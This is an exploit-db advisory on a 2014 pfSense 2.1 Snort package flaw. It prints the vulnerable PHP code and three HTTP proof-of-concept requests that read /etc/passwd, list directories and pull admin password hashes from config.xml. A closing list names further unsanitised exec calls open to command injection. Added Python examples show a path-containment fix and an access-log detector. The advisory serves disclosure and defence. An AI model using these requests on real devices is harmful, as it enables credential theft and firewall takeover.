pfSense 2.1 build 20130911-1816 – Directory Traversal

  • Author: @u0x
    Date: 2014-01-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/31263/
  • ######################################################################
    #_ ____ _______________
    #| | / _ \| \ | |/ ___|/ ___|/ \|_ _|
    #| || | | |\| | |_| | / _ \ | |
    #| |__| |_| | |\| |_| | |___ / ___ \| |
    #|_____\___/|_| \_|\____|\____/_/ \_\_|
    #
    # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
    # Date: 25/01/2014 (0-day)
    # Exploit Author: @u0x (Pichaya Morimoto)
    # Software Link: www.pfsense.org
    # Category: Local File Inclusion (LFI) & Privilege Escalation
    # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
    #
    #####################################################################
    
    
    
    pfSense firewall/router distribution description :
    
    ======================================================================
    
    pfSense is a free, open source customized distribution of FreeBSD tailored
    for use as a firewall and router. In addition to being a powerful, flexible
    firewalling and routing platform, it includes a long list of related
    features and a package system allowing further expandability without adding
    bloat and potential security vulnerabilities to the base distribution.
    pfSense is a popular project with more than 1 million downloads since its
    inception, and proven in countless installations ranging from small home
    networks protecting a PC and an Xbox to large corporations, universities
    and other organizations protecting thousands of network devices.
    
    This project started in 2004 as a fork of the m0n0wall project, but focused
    towards full PC installations rather than the embedded hardware focus of
    m0n0wall. pfSense also offers an embedded image for Compact Flash based
    installations, however it is not our primary focus.
    
    Attack Scenario
    
    ======================================================================
    
    Authenticated users whose only permission is access to some packages in the
    web GUI (a.k.a. webConfigurator) can escalate themselves to privileged admin
    by reading the /conf/config.xml file through bugs (i.e. the Snort LFI),
    resulting in full compromise of the pfSense box.
    
    This attack abuses the user privilege scheme together with some of the
    official packages (System > Package Manager).
    
    * Session hijacking is also possible to steal less-privileged user sessions
    and perform this trick, because the webConfigurator is served over "http"
    by default.
    
    Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion Vulnerability
    
    Vulnerable file:
    
    ======================================================================
    
    snort_log_view.php
    
    [+] Checksum
    SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
    MD5: cd767e46a4e9e09ede7fd26560e37f14
    
    Vulnerable Source Code :
    ======================================================================
    http://www.pfsense.com/packages/config/snort/snort_log_view.php
    https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
    
    …(deducted)...
    
    $contents = '';
    // Read the contents of the argument passed to us.
    // Is it a fully qualified path and file?
    
    if (file_exists($_GET['logfile']))
     $contents = file_get_contents($_GET['logfile']);
    // It is not something we can display, so print an error.
    else
     $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not found!");
    $pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
    ?>
    
    …(deducted)...
    <textarea style="width:100%; height:100%;" readonly wrap="off" rows="33" cols="80" name="code2"><?=$contents;?></textarea>
    …(deducted)...
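The excerpt above passes $_GET['logfile'] straight to file_exists()/file_get_contents(), so any readable path on the box is displayed. The check a maintainer would want is canonicalisation plus a containment test against the one directory the viewer is meant to serve. The following is an added example written for this page, not pfSense or Snort package code, and it is in Python rather than PHP so that it can be run as-is; the same logic maps onto PHP's realpath() and a prefix comparison. The directory layout (a log directory, a config.xml outside it, and a symlink pointing at it) is constructed in a temporary directory for the demonstration.

```python
"""Allowlist-based log file resolution: the containment check that the
snort_log_view.php excerpt lacks. Added example, not pfSense code.
The directory layout below is constructed in a temp dir for the demo."""
import os
import tempfile


class LogPathError(ValueError):
    """Raised when a requested log file is outside the allowed directory."""


def resolve_log_file(log_dir: str, requested: str) -> str:
    """Return the canonical path of `requested` only if it is a regular
    file located inside `log_dir` after symlink and '..' resolution."""
    base = os.path.realpath(log_dir)
    # The request is treated as a bare file name relative to the log dir;
    # an absolute path such as /etc/passwd is rejected outright.
    if os.path.isabs(requested):
        raise LogPathError(f"absolute path not allowed: {requested!r}")
    candidate = os.path.realpath(os.path.join(base, requested))
    # Containment check: the canonical path must sit strictly below base,
    # which also defeats symlinks placed inside the log directory.
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        raise LogPathError(f"path escapes log directory: {requested!r}")
    if not os.path.isfile(candidate):
        raise LogPathError(f"not a regular file: {requested!r}")
    return candidate


def demo() -> dict:
    """Build a constructed layout and run the same inputs the PoCs use."""
    root = tempfile.mkdtemp()
    log_dir = os.path.join(root, "var", "log", "snort")   # constructed
    os.makedirs(log_dir)
    os.makedirs(os.path.join(root, "conf"))
    with open(os.path.join(log_dir, "alert"), "w") as fh:
        fh.write("constructed alert line\n")
    with open(os.path.join(root, "conf", "config.xml"), "w") as fh:
        fh.write("<pfsense/>\n")
    # A symlink inside the log dir pointing at config.xml must also be caught.
    os.symlink(os.path.join(root, "conf", "config.xml"),
               os.path.join(log_dir, "evil"))
    results = {}
    for req in ("alert", "/etc/passwd", "../",
                "../../../conf/config.xml", "evil"):
        try:
            resolve_log_file(log_dir, req)
            results[req] = "allowed"
        except LogPathError:
            results[req] = "rejected"
    return results


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{req!r:32} {verdict}")
```

Only the plain file name inside the log directory is accepted; the absolute path, the bare `../`, the relative traversal and the symlink are all rejected by the same check, which is why canonicalising before comparing matters more than filtering `..` substrings.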
    
    
    
    Proof of Concept 1 : Arbitrary File Inclusion
    ======================================================================
    
    GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
    Host: firewall1.pentestlab1:1337
    Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: th,en-US;q=0.8,en;q=0.6
    Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
    
    HTTP/1.1 200 OK
    Expires: Mon, 27 Jan 2014 07:25:10 GMT
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: max-age=180000
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
    X-Frame-Options: SAMEORIGIN
    Pragma: no-cache
    Content-type: text/html
    Transfer-Encoding: chunked
    Date: Sat, 25 Jan 2014 05:25:10 GMT
    Server: lighttpd/1.4.32
    
    …(deducted)...
    <td colspan="2" valign="top" class="label">
     <div style="background: #eeeeee; width:100%; height:100%;"
    id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag
    must be on the same line. -->
     <textarea style="width:100%; height:100%;" readonly wrap="off"
    rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
    toor:*:0:0:Bourne-again Superuser:/root:
    daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
    operator:*:2:5:System &:/:/usr/sbin/nologin
    …(deducted)...
    havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
    squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
    c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
    snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
    …(deducted)...
    
    Proof of Concept 2 : Directory Traversal
    # This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) + Lighttpd/1.4.32 on FreeBSD 8.3 x64
    ======================================================================
    
    GET /snort/snort_log_view.php?logfile=../ HTTP/1.1
    Host: firewall1.pentestlab1:1337
    Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: th,en-US;q=0.8,en;q=0.6
    Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
    
    …(deducted)...
    ¬p.Z..­p firewall_rules_edit.php®p
    xmlrpc.php¯p
    wizard.php°p
    vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p
    vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p
    vpn_openvpn_client.php¸p
    vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php»p
    vpn_ipsec_phase2.php¼p vpn_ipsec_phase1.php½p(vpn_ipsec_mobile.php¾p
    vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp
    vpn_ipsec.phpÁpuploadconfig.phpÂptreeview.cssÃpwizardsÏp
    tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!
    …(deducted)...
    
    Proof of Concept 3 : Privilege Escalation
    # -rw-r--r--root wheel 30k Jan 25 11:35 config.xml
    ======================================================================
    
    GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1
    Host: firewall1.pentestlab1:1337
    Connection: keep-alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: th,en-US;q=0.8,en;q=0.6
    Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
    
    …(deducted)...
    <group>
     <name>office</name>
     <description><![CDATA[Main Office Employees]]></description>
     <member>2000</member>
     <gid>2000</gid>
    </group>
    <user>
     <name>admin</name>
     <descr><![CDATA[System Administrator]]></descr>
     <scope>system</scope>
     <groupname>admins</groupname>
     <password>$1$y8KiO3ow$mmMX4R0hE…(deducted)...</password>
     <uid>0</uid>
     <priv>user-shell-access</priv>
     <md5-hash>d4383b6f4c9fa…(deducted)...</md5-hash>
     <nt-hash>356239666432306265376131653…(deducted)...</nt-hash>
    </user>
    …(deducted)...
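All three proofs of concept are ordinary GET requests to snort_log_view.php, so they leave a clear trace in the web server's access log: a `logfile` parameter that is an absolute path or contains traversal rather than a plain file name. The detection below is an added example, not part of the advisory or of pfSense; the log lines are constructed in lighttpd's default combined-style format and mirror the three PoC requests plus a URL-encoded variant and a benign request.

```python
"""Detection over web-server access logs: flag snort_log_view.php requests
whose logfile parameter is an absolute path or contains traversal.
Added example; sample lines are constructed, in combined-style format."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (not from a real system).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jan/2014:05:25:10 +0000] "GET /snort/snort_log_view.php?logfile=alert HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jan/2014:05:25:11 +0000] "GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jan/2014:05:25:12 +0000] "GET /snort/snort_log_view.php?logfile=../ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jan/2014:05:25:13 +0000] "GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1" 200 30720 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jan/2014:05:25:14 +0000] "GET /snort/snort_log_view.php?logfile=%2Fconf%2Fconfig.xml HTTP/1.1" 200 30720 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Jan/2014:05:26:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined-style line: host ident user [time] "method target proto" status ...
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def is_suspicious_logfile(value: str) -> bool:
    """True unless the value looks like a bare file name inside the log dir."""
    return (value.startswith("/") or ".." in value
            or "\\" in value or "\x00" in value)


def scan_access_log(text: str) -> list:
    """Return one finding per suspicious logfile parameter seen in `text`.
    parse_qs URL-decodes, so %2F-encoded paths are caught as well."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/snort_log_view.php"):
            continue
        for value in parse_qs(parts.query).get("logfile", []):
            if is_suspicious_logfile(value):
                findings.append({
                    "src": m.group("src"),
                    "ts": m.group("ts"),
                    "logfile": value,
                    "status": m.group("status"),
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']}  {f['src']}  status={f['status']}  logfile={f['logfile']}")
```

A status of 200 on a flagged request is the interesting case: with the vulnerable viewer the file was actually returned, so a hit on /conf/config.xml should be treated as credential exposure for every account in that file, not just as a blocked probe.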
    
    P.S. There are many other ways to escalate from less-privileged users using
    official packages. For example, some OS command injections (Feel free to dig
    deeper than me.. LoL)
    
    arping/arping.inc:38: system("arping -c3 " . $_POST['hostip']);
    tinc/tinc.inc:173: mwexec("/sbin/ifconfig {$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']);
    spamd/spamd_db_ext.php:57: exec("echo {$_GET['action']} > /tmp/tmp");
    spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep \"{$_GET['getstatus']}\"");
    freeswitch_dev/v_profiles.tmp:38: exec("cp ".$v_conf_dir.".orig/sip_profiles/".$_GET['f']." ".$v_conf_dir."/sip_profiles/".$_GET['f']);
    freeswitch_dev/v_profiles.tmp:60: exec("rm ".$v_conf_dir."/sip_profiles/".$_GET['f']);
    snort-dev/snortsam-package-code/snort_new.inc:112: exec("/bin/ln -s /usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules {$pathToSnortDir}/{$newSnortDir}/rules");
    snort-dev/snortsam-package-code/snort_new.inc:129: $sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] . '\;/= ' . $workingFile);
    
    # Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand.
    # Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE